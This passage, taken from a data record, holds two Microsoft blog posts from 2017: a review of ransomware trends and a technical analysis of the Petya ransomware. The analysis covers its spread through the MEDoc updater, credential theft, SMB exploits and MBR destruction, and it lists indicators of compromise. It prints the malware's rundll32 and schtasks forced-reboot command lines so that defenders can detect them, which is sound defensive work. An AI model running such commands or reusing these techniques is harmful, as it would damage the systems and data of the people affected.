epidemics](<https://blogs.technet.microsoft.com/mmpc/2017/01/30/averting-ransomware-epidemics-in-corporate-networks-with-windows-defender-atp/>) by enabling responders to detect, respond to, and investigate attacks so infections can be contained and not allowed to swell. 
[Security patches](<https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/>) need to be applied as soon as they become available.\n\n## Increasing sophistication\n\nThe trend of global outbreaks is likely a result of more techniques incorporated by ransomware. WannaCrypt, Petya, Spora, and other new ransomware variants sported new capabilities that allowed them to spread faster and wreak more havoc than other malware.\n\n### Lateral movement using exploits\n\nSpora\u2019s aforementioned ability to spread via network drives and removable drives made it one of the most widespread ransomware. Though it was not the first ransomware family to integrate a worm-like spreading mechanism, it was able to use this capability to infect more computers.\n\nWith worm capabilities, ransomware attacks can have implications beyond endpoint security, introducing challenges to enterprise networks. This was particularly true for WannaCrypt, which spread by exploiting a vulnerability ([CVE-2017-0144](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144>), dubbed EternalBlue, previously patched in security update [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)), affecting networks with out-of-date computers.\n\nPetya expanded on WannaCrypt\u2019s spreading mechanism by exploiting not one, but two vulnerabilities. Apart from CVE-2017-0144, it also exploited [CVE-2017-0145](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>) (known as EternalRomance, and fixed in the same security update as EternalBlue), affecting out-of-date systems.\n\nThese two attacks highlighted the importance of applying security patches as they become available. 
They likewise highlight the importance of immediately detecting and stopping malicious behavior related to exploits.\n\nIt is important to note that the EternalBlue and EternalRomance exploits did not affect Windows 10, underscoring the benefits of upgrading to the latest, most secure version of platforms and software. Even if the exploits were designed to work on Windows 10, the platform has multiple [mitigations against exploits](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>), including [zero-days](<https://blogs.technet.microsoft.com/mmpc/2017/01/13/hardening-windows-10-with-zero-day-exploit-mitigations/>). In addition, Windows Defender Advanced Threat Protection ([Windows Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp>)) [detects malicious activities resulting from exploits](<https://blogs.technet.microsoft.com/mmpc/2017/06/30/exploring-the-crypt-analysis-of-the-wannacrypt-ransomware-smb-exploit-propagation/>) without the need for signature updates.\n\n### Credential theft\n\nOne of Petya\u2019s more noteworthy behaviors is its credential-stealing capability, which it does either by using a credential dumping tool or by stealing from the Credential Store. This capability poses a significant security challenge for networks with users who sign in with local admin privileges and have active sessions opens across multiple machines. In this situation, stolen credentials can provide the same level of access the users have on other machines.\n\nThe Petya outbreak is testament to the importance of credential hygiene. Enterprises need to constantly review privileged accounts, which have unhampered network access and access to corporate secrets and other critical data. 
[Credential Guard](<https://docs.microsoft.com/en-us/windows/access-protection/credential-guard/credential-guard>) uses virtualization-based security to protect derived domain credentials and stop attempts to compromise privileged accounts.\n\n### Network scanning\n\nArmed with exploits or stolen credentials, ransomware can spread across networks through network scanning. For example, Petya scanned affected networks to establish valid connections to other computers. It then attempted to transfer copies of the malware using stolen credentials. Petya also scanned for network shares in an attempt to spread through those shares.\n\nWannaCrypt, on the other hand, ran massive scanning of IP addresses to look for computers that are vulnerable to the EternalBlue exploit. This gave it the ability to spread to out-of-date computers outside the network. Network defenders can uncover and stop unauthorized network scanning behaviors.\n\n### Destructive behavior\n\nIn most ransomware cases, the attacker motivation is clear: victims need to pay the ransom or never gain back access to encrypted files. While there is no guarantee that files are decrypted after payment is made, most ransomware infections make their intention clear through a ransom note. In August, WannaCrypt actors wrapped up their campaign by [withdrawing ransom pain in Bitcoins from online wallets](<http://www.bbc.com/news/technology-40811972>).\n\nPetya behaved like other ransomware in this aspect. Attackers [emptied the Petya online wallets](<https://www.theguardian.com/technology/2017/jul/05/notpetya-ransomware-hackers-ukraine-bitcoin-ransom-wallet-motives>) earlier in July. However, Petya had far more destructive routines: it overwrote or damaged the Master Boot Record (MBR) and Volume Boot Record (VBR), rendering affected computers unusable. 
This started a conversation about whether this Petya variant was primarily a ransomware like WannaCrypt or a destructive cyberattack like [Depriz](<https://blogs.technet.microsoft.com/mmpc/2016/12/09/windows-10-protection-detection-and-response-against-recent-attacks/>) (also known as Shamoon).\n\n\n\n_Figure 4. Petya incorporated complex behaviors not typical of ransomware_\n\nThe debate is not settled, but the Petya attack does raise an important point\u2014attackers can easily incorporate other payloads into ransomware code to facilitate [targeted attacks](<https://krebsonsecurity.com/2016/09/ransomware-getting-more-targeted-expensive/>) and other types of destructive cyberattacks. As the threat of ransomware escalates, enterprises and individuals alike need a sound cybersecurity strategy and a protection suite that will defend against the end-to-end ransomware infection process.\n\n## Integrated end-to-end security suite against ransomware\n\nWith high-profile global outbreaks and other notable trends, the first six months of 2017 can be considered one of the more turbulent periods in the history of ransomware. The observations we summarized in this blog highlight the potency of the ransomware threat. Unfortunately, given the trends, we may see similarly sophisticated or even more complex attacks in the foreseeable future. More importantly, however, we should learn from these attacks and developments, because they highlight the areas of cybersecurity that need to be improved and reevaluated.\n\nAt Microsoft, we\u2019re always hard at work to continuously harden Windows 10 against ransomware and other attacks. In the upcoming [Windows 10 Fall Creators Update](<https://blogs.windows.com/business/2017/06/27/announcing-end-end-security-features-windows-10/>), we will integrate Microsoft security solutions into a powerful single pane of glass\u2014centralized management that will allow customers to consume, manage, and integrate security for devices in the network. 
Windows Defender ATP will be expanded to include seamless integration across the entire Windows protection stack. The suite of tools will include the new Windows Defender Exploit Guard and Windows Defender Application Guard, as well as the enhanced Windows Defender Device Guard and Windows Defender AV.\n\nToday, Windows 10 Creators Update has [next-gen technologies that protect against ransomware attacks](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>).\n\n\n\n_Figure 5. Windows 10 end-to-end protection stack (source: _[_Next-gen ransomware protection with Windows 10 Creators Update_](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>)_)_\n\nWindows 10 has [multiple exploit mitigations](<https://blogs.technet.microsoft.com/mmpc/2017/01/13/hardening-windows-10-with-zero-day-exploit-mitigations/>), including control flow-guard for kernel (kCFG), kernel mode code integrity (KMCI), better kernel address space layout randomization (KASLR), NX HAL, and PAGE POOL (non-executable kernel regions). These mitigations help make [Windows 10 resilient](<https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/>) to exploit attacks, such as those used by WannaCrypt and Petya.\n\n### Intelligent Security Graph and machine learning\n\nSecurity built into Windows 10 is powered by the Microsoft [Intelligent Security Graph](<https://t.co/UpWPG34Kwy>), which correlates signals from billions of sensors. 
Unique insights from this vast security intelligence enable Microsoft to deliver real-time protection through [Windows Defender AV](<https://www.microsoft.com/en-us/windows/windows-defender>), [Windows Defender ATP](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp>), and other next-gen security technologies.\n\nThe increasing magnitude and complexity of ransomware require advanced real-time protection. [Windows Defender AV](<https://www.microsoft.com/en-us/windows/windows-defender>) uses precise [machine learning models](<https://blogs.technet.microsoft.com/mmpc/2017/05/08/antivirus-evolved/>) as well as generic and heuristic techniques, improved detection of script-based ransomware, and enhanced behavior analysis to detect common and complex ransomware code. Using the cloud protection service, Windows Defender AV provides real-time protection. In recent enhancements, the [cloud protection service can make a swift assessment](<https://blogs.technet.microsoft.com/mmpc/2017/07/18/windows-defender-antivirus-cloud-protection-service-advanced-real-time-defense-against-never-before-seen-malware/>) of new and unknown files, allowing Windows Defender AV to block new malware the first time it is seen.\n\n[Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/windowsforbusiness/windows-atp>) empowers SecOps personnel to [stop ransomware outbreaks](<https://blogs.technet.microsoft.com/mmpc/2017/01/30/averting-ransomware-epidemics-in-corporate-networks-with-windows-defender-atp/>) in the network. Both WannaCrypt and Petya showed how critical it is to detect, investigate, and respond to ransomware attacks and prevent the spread. Windows Defender ATP\u2019s enhanced behavioral and [machine learning detection libraries](<https://blogs.technet.microsoft.com/mmpc/2017/08/03/windows-defender-atp-machine-learning-detecting-new-and-unusual-breach-activity/>) flag malicious behavior across the ransomware infection process. 
The new process tree visualization and improvements in machine isolation further help security operations to investigate and respond to ransomware attacks.\n\n### Online safety with Microsoft Edge and Office 365 Advanced Threat Protection\n\n[Microsoft Edge](<https://docs.microsoft.com/en-us/microsoft-edge/deploy/index>) can help block ransomware infections from the web by opening pages within app container boxes. It uses reputation-based blocking of downloads. Its click-to-run feature for Flash can stop ransomware infections that begin with exploit kits.\n\nTo defend against ransomware attacks that begin with email, [Microsoft Exchange Online Protection (EOP)](<https://products.office.com/en-us/exchange/exchange-email-security-spam-protection>) uses built-in anti-spam filtering capabilities that help protect Office 365 customers. [Office 365 Advanced Threat Protection](<https://products.office.com/en-us/exchange/online-email-threat-protection>) helps secure mailboxes against email attacks by blocking emails with unsafe attachments, malicious links, and linked-to files leveraging time-of-click protection. Outlook.com anti-spam filters also provide protection against malicious emails.\n\n### Virtualization-based security and application control\n\n[Credential Guard](<https://docs.microsoft.com/en-us/windows/access-protection/credential-guard/credential-guard>) can protect domain credentials from attacks like Petya, which attempted to steal credentials for use in lateral movement. Credential Guard uses virtualization-based security to protect against credential dumping.\n\nEnterprises can implement virtualization-based lockdown security, which can block all types of unauthorized content. 
[Windows Defender Device Guard](<https://docs.microsoft.com/en-us/windows/device-security/device-guard/introduction-to-device-guard-virtualization-based-security-and-code-integrity-policies>) combines virtualization-based security and application control to allow only authorized apps to run. Petya, whose first infections were traced back to a compromised software update process, was blocked on devices with Device Guard enabled.\n\n### Microsoft-vetted security with Windows 10 S and more security features in Windows 10 Fall Creators Update\n\nDevices can achieve a similar lockdown security with [Windows 10 S](<https://www.microsoft.com/en-us/windows/windows-10-s>), which streamlines security and performance by working exclusively with apps from the Windows Store, ensuring that only apps that went through the Store onboarding, vetting, and signing process are allowed to run.\n\nAll of these security features make Windows 10 our most secure platform. Next-gen security technologies in Windows 10 provide next-gen protection against ransomware.\n\n\n\n_Figure 6. Windows 10 next-gen security _\n\nBut the work to further harden Windows 10 against ransomware and other threats continues. Expect more security features and capabilities in the upcoming [Windows 10 Fall Creators Update](<https://blogs.windows.com/business/2017/06/27/announcing-end-end-security-features-windows-10/>).\n\n \n\n**_Tanmay Ganacharya (_**[**@tanmayg**](<https://twitter.com/tanmayg>)**_)_**\n\n_Principal Group Manager, Windows Defender Research_\n\n#### \n\n \n\n* * *\n\n#### **Talk to us**\n\nQuestions, concerns, or insights on this story? 
Join discussions at the [Microsoft community](<https://answers.microsoft.com/en-us/protect>).\n\nFollow us on Twitter [@MMPC](<https://twitter.com/msftmmpc>) and Facebook [Microsoft Malware Protection Center](<https://www.facebook.com/msftmmpc/>)", "edition": 2, "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-09-06T14:58:36", "title": "Ransomware 1H 2017 review: Global outbreaks reinforce the value of security hygiene", "type": "mmpc", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-0145"], "modified": "2017-09-06T14:58:36", "href": "https://blogs.technet.microsoft.com/mmpc/2017/09/06/ransomware-1h-2017-review-global-outbreaks-reinforce-the-value-of-security-hygiene/", "id": "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-15T09:08:41", "description": "_(Note: We have published a follow-up blog entry on this ransomware attack. 
We have new findings from our continued investigation, as well as platform mitigation and protection information: [Windows 10 platform resilience against the Petya ransomware attack](<https://blogs.technet.microsoft.com/mmpc/2017/06/29/windows-10-platform-resilience-against-the-petya-ransomware-attack/>). Read our latest comprehensive report on ransomware: [**Ransomware 1H 2017 review: Global outbreaks reinforce the value of security hygiene**](<https://blogs.technet.microsoft.com/mmpc/2017/09/06/ransomware-1h-2017-review-global-outbreaks-reinforce-the-value-of-security-hygiene/>).)_\n\n \n\nOn June 27, 2017, reports of a [ransomware](<https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx>) infection began spreading across Europe. We saw the first infections in Ukraine, where more than 12,500 machines encountered the threat. We then observed infections in another 64 countries, including Belgium, Brazil, Germany, Russia, and the United States.\n\nThe new ransomware has worm capabilities, which allow it to move laterally across infected networks. Based on our investigation, this new ransomware shares similar code and is a new variant of [Ransom:Win32/Petya](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/Entry.aspx?Name=Ransom:Win32/Petya>). This new strain of ransomware, however, is more sophisticated.\n\nTo protect our customers, we released cloud-delivered protection updates and made updates to our signature definition packages shortly after. These updates were automatically delivered to all Microsoft free antimalware products, including [Windows Defender Antivirus](<https://technet.microsoft.com/en-us/itpro/windows/keep-secure/windows-defender-in-windows-10>) and Microsoft Security Essentials. 
You can download the latest version of these files manually at the [Malware Protection Center](<https://www.microsoft.com/security/portal/definitions/adl.aspx>).\n\n[Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) (Windows Defender ATP) automatically detects behaviors used by this new ransomware variant without any updates.\n\n## Delivery and installation\n\nInitial infection appears to involve a software supply-chain threat involving the Ukrainian company M.E.Doc, which develops tax accounting software, MEDoc. Although this vector was speculated at length by news media and security researchers\u2014including Ukraine\u2019s own Cyber Police\u2014there was only circumstantial evidence for this vector. Microsoft now has evidence that a few active infections of the ransomware initially started from the legitimate MEDoc updater process. As we highlighted previously, [software supply chain attacks](<https://blogs.technet.microsoft.com/mmpc/2017/05/04/windows-defender-atp-thwarts-operation-wilysupply-software-supply-chain-cyberattack/>) are a recent dangerous trend with attackers, and it requires advanced defense.\n\nWe observed telemetry showing the MEDoc software updater process (_EzVit.exe)_ executing a malicious command-line matching this exact attack pattern on Tuesday, June 27 around 10:30 a.m. 
GMT.\n\nThe execution chain leading to the ransomware installation is represented in the diagram below and essentially confirms that the _EzVit.exe_ process from MEDoc, for unknown reasons, at some moment executed the following command-line:\n\n_C:\\\\\\Windows\\\\\\system32\\\\\\rundll32.exe\\\" \\\"C:\\\\\\ProgramData\\\\\\perfc.dat\\\",#1 30_\n\n\n\nThe same update vector was also mentioned by the Ukraine Cyber Police in a public list of indicators of compromise (IOCs), which includes the MEDoc updater.\n\n## A single ransomware, multiple lateral movement techniques\n\nGiven this new ransomware's added lateral movement capabilities, it only takes a single infected machine to affect a network. The ransomware spreading functionality is composed of multiple methods responsible for:\n\n * stealing credentials or re-using existing active sessions\n * using file-shares to transfer the malicious file across machines on the same network\n * using existing legitimate functionalities to execute the payload or abusing SMB vulnerabilities for unpatched machines\n\nIn the next sections, we discuss the details of each technique.\n\n## Lateral movement using credential theft and impersonation\n\nThis ransomware drops a credential dumping tool (typically as a .tmp file in the _%Temp%_ folder) that shares code similarities with [Mimikatz](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/Entry.aspx?Name=HackTool:Win32/Mimikatz>) and comes in 32-bit and 64-bit variants. Because users frequently log in using accounts with local admin privileges and have active sessions open across multiple machines, stolen credentials are likely to provide the same level of access the user has on other machines.\n\nOnce the ransomware has valid credentials, it scans the local network to establish valid connections on ports _tcp/139_ and _tcp/445_. 
A special behavior is reserved for Domain Controllers or servers: this ransomware attempts to call _DhcpEnumSubnets()_ to enumerate DHCP subnets; for each subnet, it gathers all hosts/clients (using _DhcpEnumSubnetClients()_) for scanning for _tcp/139_ and _tcp/445_ services. If it gets a response, the malware attempts to copy a binary on the remote machine using regular file-transfer functionalities with the stolen credentials.\n\nIt then tries to execute remotely the malware using either PSEXEC or WMIC tools.\n\nThe ransomware attempts to drop the legitimate _psexec.exe_ (typically renamed to _dllhost.dat_) from an embedded resource within the malware. It then scans the local network for _admin$_ shares, copies itself across the network, and executes the newly copied malware binary remotely using PSEXEC.\n\nIn addition to credential dumping, the malware also tries to steal credentials by using the _CredEnumerateW_ function to get all the other user credentials potentially stored on the credential store. If a credential name starts with _\"TERMSRV/\"_ and the type is set as 1 (generic) it uses that credential to propagate through the network.\n\n\n\n_Ransomware code responsible for accessing \\\\\\Admin$ shares on different machines_\n\nThis ransomware also uses the Windows Management Instrumentation Command-line (WMIC) to find remote shares (using _NetEnum/NetAdd_) to spread to. 
It uses either a duplicate token of the current user (for existing connections), or a username/password combination (spreading through legit tools).\n\n\n\n_Screenshot showing launch of malware on a remote machine using WMIC_\n\n## Lateral movement using EternalBlue and EternalRomance\n\nThe new ransomware can also spread using an exploit for the Server Message Block (SMB) vulnerability [CVE-2017-0144](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0144>) (also known as EternalBlue), which was fixed in [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) and was also exploited by [WannaCrypt](<https://blogs.technet.microsoft.com/mmpc/2017/05/12/wannacrypt-ransomware-worm-targets-out-of-date-systems/>) to spread to out-of-date machines. In addition, this ransomware also uses a second exploit for [CVE-2017-0145](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0145>) (also known as EternalRomance, and fixed by the same bulletin).\n\nWe\u2019ve seen this ransomware attempt to use these exploits by generating SMBv1 packets (which are all _XOR 0xCC_ encrypted) to trigger these vulnerabilities at the following address of the malware code:\n\n\n\n\n\nThese two exploits were leaked by a group called [Shadow Brokers](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>). However, it is important to note that both of these vulnerabilities have been fixed by Microsoft in [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) on March 14, 2017.\n\nMachines that are patched against these exploits (with [security update MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>)) or [have disabled SMBv1](<https://support.microsoft.com/kb/2696547>) are not affected by this particular spreading mechanism. 
Please refer to our previous [blog](<https://blogs.technet.microsoft.com/mmpc/2017/06/16/analysis-of-the-shadow-brokers-release-and-mitigation-with-windows-10-virtualization-based-security/>) for details on these exploits and how modern Windows 10 mitigations can help to contain similar threats.\n\n## Encryption\n\nThis ransomware\u2019s encryption behavior depends on the malware process privilege level and the processes found to be running on the machine. It does this by employing a simple XOR-based hashing algorithm on the process names, and checks against the following hash values to use as a behavior exclusion:\n\n\n\n * _0x6403527E_ or _0x651B3005_ \u2013 if these hashes of process names are found running on the machine, then the ransomware does not do SMB exploitation.\n\n\n\n * _0x2E214B44 _ \u2013 if a process with this hashed name is found, the ransomware trashes the first 10 sectors of _\\\\\\\\\\\\\\\\.\\\\\\PhysicalDrive0_, including the MBR\n\n\n\nThis ransomware then writes to the master boot record (MBR) and then sets up the system to reboot. It sets up scheduled tasks to shut down the machine after at least 10 minutes past the current time. The exact time is random _(GetTickCount())_. 
For example:\n\n_schtasks /Create /SC once /TN \"\" /TR \"<system folder>\\shutdown.exe /r /f\" /ST 14:23_\n\nAfter successfully modifying the MBR, it displays the following fake system message, which notes a supposed error in the drive and shows the fake integrity checking:\n\n\n\nIt then displays this ransom note:\n\n\n\nOnly if the malware is running with highest privilege (i.e., with _SeDebugPrivilege_ enabled), it tries to overwrite the MBR code.\n\nThis ransomware attempts to encrypt all files with the following file name extensions in all folders in all fixed drives, except for _C:\\Windows_:\n\n.3ds | .7z | .accdb | .ai \n---|---|---|--- \n.asp | .aspx | .avhd | .back \n.bak | .c | .cfg | .conf \n.cpp | .cs | .ctl | .dbf \n.disk | .djvu | .doc | .docx \n.dwg | .eml | .fdb | .gz \n.h | .hdd | .kdbx | .mail \n.mdb | .msg | .nrg | .ora \n.ost | .ova | .ovf | .pdf \n.php | .pmf | .ppt | .pptx \n.pst | .pvi | .py | .pyc \n.rar | .rtf | .sln | .sql \n.tar | .vbox | .vbs | .vcb \n.vdi | .vfd | .vmc | .vmdk \n.vmsd | .vmx | .vsdx | .vsv \n.work | .xls | .xlsx | .xvd \n.zip | | | \n \nIt uses file mapping APIs instead of a usual _ReadFile()_/_WriteFile()_ APIs:\n\n\n\nUnlike most other ransomware, this threat does not append a new file name extension to encrypted files. 
Instead, it overwrites the said files.\n\nThe AES key generated for encryption is per machine, per fixed drive, and gets exported and encrypted using the embedded 2048-bit RSA public key of the attacker.\n\n\n\n_Embedded RSA public key_\n\n\n\n_Code exporting the AES 128 bit key per machine, per fixed drive in the machine and encrypting it using embedded RSA public key during export_\n\nThe unique key used for file encryption (AES) is added, in encrypted form, to the _README.TXT_ file the threat writes under section _\"Your personal installation key:\"_.\n\nBeyond encrypting files, this ransomware also attempts to infect the MBR or destroy certain sectors of VBR and MBR:\n\n\n\nAfter completing its encryption routine, this ransomware drops a text file called _README.TXT_ in each fixed drive. The said file has the following text:\n\n\n\nThis ransomware also clears the System, Setup, Security, Application event logs and deletes NTFS journal info.\n\n## Detection and investigation with Windows Defender Advanced Threat Protection\n\n[Windows Defender Advanced Threat Protection](<https://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>) (Windows Defender ATP) is a post-breach solution and offers by-design detections for this attack without need of any signature updates. Windows Defender ATP sensors constantly monitor and collect telemetry from the endpoints and offer machine-learning detections for common lateral movement techniques and tools used by this ransomware, including, for example, the execution of _PsExec.exe_ with different filename, and the creation of the _perfc.dat_ file in remote shares (UNC) paths.\n\nToday, without the need of additional updates, an infected machine may look like this:\n\n\n\nThe second alert targets the distribution of the ransomware\u2019s .dll file over the network. This event provides helpful information during investigation as it includes the User context that was used to move the file remotely. 
This user has been compromised and could represent the user associated with patient-zero:\n\n\n\nWith Windows Defender ATP, enterprise customers are well-equipped to quickly identify Petya outbreaks, investigate the scope of the attack, and respond early to malware delivery campaigns.\n\n## Protection against this new ransomware attack\n\nKeeping your [Windows 10](<https://www.microsoft.com/en-us/windows/windows-10-upgrade>) [up-to-date](<https://support.microsoft.com/en-us/help/311047/how-to-keep-your-windows-computer-up-to-date>) gives you the benefits of the latest features and proactive mitigations built into the latest versions of Windows. In Creators Update, we further [hardened Windows 10 against ransomware attacks](<https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>) by introducing new next-gen technologies and enhancing existing ones.\n\nAs another layer of protection, [Windows 10 S](<https://www.microsoft.com/en-us/windows/windows-10-s>) only allows apps that come from the Windows Store to run. Windows 10 S users are further protected from this threat.\n\nWe recommend customers that have not yet installed security update [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) to do so as soon as possible. Until you can apply the patch, we also recommend two possible workarounds to reduce the attack surface:\n\n * Disable SMBv1 with the steps documented at [Microsoft Knowledge Base Article 2696547](<https://support.microsoft.com/kb/2696547>) and as [recommended previously](<https://blogs.technet.microsoft.com/filecab/2016/09/16/stop-using-smb1/>)\n * Consider adding a rule on your router or firewall to block incoming SMB traffic on port 445\n\nAs the threat targets ports 139 and 445, you can block any traffic on those ports to prevent propagation either into or out of machines in the network. You can also disable remote WMI and file sharing. 
These may have large impacts on the capability of your network, but may be suggested for a very short time period while you assess the impact and [apply definition updates](<https://www.microsoft.com/security/portal/definitions/adl.aspx>).\n\nAside from exploiting vulnerabilities, this threat can also spread across networks by stealing credentials, which it then uses to attempt to copy and execute a copy on remote machines. You can prevent credential theft by ensuring credential hygiene across the organization. [Secure privileged access](<https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access>) to prevent the spread of threats like Petya and to protect your organization\u2019s assets. Use [Credential Guard](<https://docs.microsoft.com/en-us/windows/access-protection/credential-guard/credential-guard>) to protect domain credentials stored in the Windows Credential Store.\n\nWindows Defender Antivirus detects this threat as [Ransom:Win32/Petya](<https://www.microsoft.com/en-us/security/portal/threat/encyclopedia/entry.aspx?Name=Ransom:Win32/Petya>) as of the [1.247.197.0 update](<https://www.microsoft.com/security/portal/definitions/adl.aspx>). Windows Defender Antivirus uses cloud-based protection, helping to protect you from the latest threats.\n\nFor enterprises, use [Device Guard](<https://technet.microsoft.com/itpro/windows/keep-secure/device-guard-deployment-guide>) to lock down devices and provide kernel-level virtualization-based security, allowing only trusted applications to run, effectively preventing malware from running.\n\nMonitor networks with [Windows Defender Advanced Threat Protection](<http://www.microsoft.com/en-us/WindowsForBusiness/windows-atp>), which alerts security operations teams about suspicious activities. 
Download this playbook to see how you can leverage Windows Defender ATP to detect, investigate, and mitigate ransomware in networks: [Windows Defender Advanced Threat Protection \u2013 Ransomware response playbook](<https://www.microsoft.com/en-us/download/details.aspx?id=55090>).\n\n## Resources\n\nMSRC blog: <https://blogs.technet.microsoft.com/msrc/2017/06/28/update-on-petya-malware-attacks/>\n\nNext-generation ransomware protection with Windows 10 Creators Update: <https://blogs.technet.microsoft.com/mmpc/2017/06/08/windows-10-creators-update-hardens-security-with-next-gen-defense/>\n\nDownload English language security updates: [Windows Server 2003 SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows Server 2003 SP2 x86,](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x86-custom-enu_f617caf6e7ee6f43abe4b386cb1d26b3318693cf.exe>) [Windows XP SP2 x64](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsserver2003-kb4012598-x64-custom-enu_f24d8723f246145524b9030e4752c96430981211.exe>), [Windows XP SP3 x86](<http://download.windowsupdate.com/d/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-custom-enu_eceb7d5023bbb23c0dc633e46b9c2f14fa6ee9dd.exe>), [Windows XP Embedded SP3 x86](<http://download.windowsupdate.com/c/csa/csa/secu/2017/02/windowsxp-kb4012598-x86-embedded-custom-enu_8f2c266f83a7e1b100ddb9acd4a6a3ab5ecd4059.exe>), [Windows 8 x86,](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x86_a0f1c953a24dd042acc540c59b339f55fb18f594.msu>) [Windows 8 x64](<http://download.windowsupdate.com/c/msdownload/update/software/secu/2017/05/windows8-rt-kb4012598-x64_f05841d2e94197c2dca4457f1b895e8f632b7f8e.msu>)\n\nDownload localized language security updates: [Windows Server 2003 SP2 
x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=d3cb7407-3339-452e-8371-79b9c301132e>), [Windows Server 2003 SP2 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=350ec04d-a0ba-4a50-9be3-f900dafeddf9>), [Windows XP SP2 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=5fbaa61b-15ce-49c7-9361-cb5494f9d6aa>), [Windows XP SP3 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=7388c05d-9de6-4c6a-8b21-219df407754f>), [Windows XP Embedded SP3 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=a1db143d-6ad2-4e7e-9e90-2a73316e1add>), [Windows 8 x86](<http://www.microsoft.com/downloads/details.aspx?FamilyId=6e2de6b7-9e43-4b42-aca2-267f24210340>), [Windows 8 x64](<http://www.microsoft.com/downloads/details.aspx?FamilyId=b08bb3f1-f156-4e61-8a68-077963bae8c0>)\n\nMS17-010 Security Update: <https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>\n\nGeneral information on ransomware: <https://www.microsoft.com/en-us/security/portal/mmpc/shared/ransomware.aspx>\n\nSecurity for IT Pros: <https://technet.microsoft.com/en-us/security/default>\n\n## Indicators of Compromise\n\nNetwork defenders may search for the following indicators:\n\n**File indicators**\n\n * 34f917aaba5684fbe56d3c57d48ef2a1aa7cf06d\n * 9717cfdc2d023812dbc84a941674eb23a2a8ef06\n * 38e2855e11e353cedf9a8a4f2f2747f1c5c07fcf\n * 56c03d8e43f50568741704aee482704a4f5005ad\n\n**Command lines**\n\nIn environments where command-line logging is available, the following command lines may be searched:\n\n * Scheduled Reboot Task: Petya schedules a reboot for a random time between 10 and 60 minutes from the current time \n * _schtasks /Create /SC once /TN \"\" /TR \"<system folder>\\shutdown.exe /r /f\" /ST <time>_\n * _cmd.exe /c schtasks /RU \"SYSTEM\" /Create /SC once /TN \"\" /TR \"C:\\Windows\\system32\\shutdown.exe /r /f\" /ST <time>_\n\nThis may be surfaced by searching for EventId 106 (General Task Registration) which captures tasks registered 
